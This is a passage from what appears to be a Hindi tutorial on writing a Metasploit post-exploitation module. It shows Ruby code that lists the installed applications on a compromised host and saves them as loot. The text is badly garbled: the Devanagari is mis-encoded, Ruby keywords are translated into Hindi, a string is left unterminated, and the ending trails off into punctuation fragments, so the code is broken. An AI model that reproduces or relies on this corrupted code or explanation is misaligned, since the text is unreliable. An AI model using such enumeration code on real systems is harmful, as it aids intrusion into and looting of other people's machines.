tbl << [рдлреИрд▓рд╛рд╡, рдлреИрд▓рд╛рд╡] рдЕрдЧрд░ dispnm рдФрд░ рдлреИрд▓рд╛рд╡ рдмрдЪрд╛рд╡
рдЕрдВрдд
рдЕрдВрдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреА рдирд┐рдореНрди рдкрдВрдХреНрддрд┐рдпрд╛рдБ рд╕рдВрдмрдВрдзрд┐рдд рдХреЙрд▓рдо рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рдорд╛рдиреЛрдВ рдХреЗ рд╕рд╛рде рддрд╛рд▓рд┐рдХрд╛рдУрдВ рдХреЛ рднрд░рддреА рд╣реИрдВред рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдмрд┐рд▓реНрдЯ-рдЗрди
рд░рдЬрд┐рд╕реНрдЯреНрд░реА_рдЧреЗрдЯрд╡рд╛рд▓реНрдбрдбрд╛рдЯрд╛ рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреА рд╣реИ, рдЬреЛ рдорд╛рдиреЛрдВ рдХреЛ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ рдФрд░ рдЙрдиреНрд╣реЗрдВ рддрд╛рд▓рд┐рдХрд╛ рдореЗрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реИ:
рдкрд░рд┐рдгрд╛рдо = tbl.to_s
рдкреНрд░рд┐рдВрдЯ_рд▓рд╛рдЗрди ("\ n" + рдкрд░рд┐рдгрд╛рдо + "\ n")
p = store_loot ("host.applications", "text / plain", рд╕рддреНрд░, рдкрд░рд┐рдгрд╛рдо, "Applications.txt", "Installed Applications")
Print_status ("рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдкрд░рд┐рдгрд╛рдо: # {p}")
рдЕрдВрдд
рдбрд┐рдл рд░рди
Print_status ("# {sysinfo ['Computer']} рдкрд░ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд┐рдП рдЧрдП рдПрдкреНрд▓рд┐рдХреЗрд╢рди
app_list
рдЕрдВрдд
рдЕрдВрдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреА рдЕрдВрддрд┐рдо рдХреБрдЫ рдкрдВрдХреНрддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЛ рдЕрд▓рдЧ рдкрд╛рда рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рд╕рдВрдЧреНрд░рд╣реАрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдлрд╝рд╛рдЗрд▓ store_loot рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреЙрдкреБрд▓реЗрдЯреЗрдб рд╣реИ, рдЬреЛ рдЯреЗрдХреНрд╕реНрдЯ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рдВрдкреВрд░реНрдг рддрд╛рд▓рд┐рдХрд╛ рд╕рд╣реЗрдЬрддреА рд╣реИред
applications.txt .
store_loot , .
, , . , . Ruby .
, тАФ Metasploit Framework тАФ - :
Metasploit Framework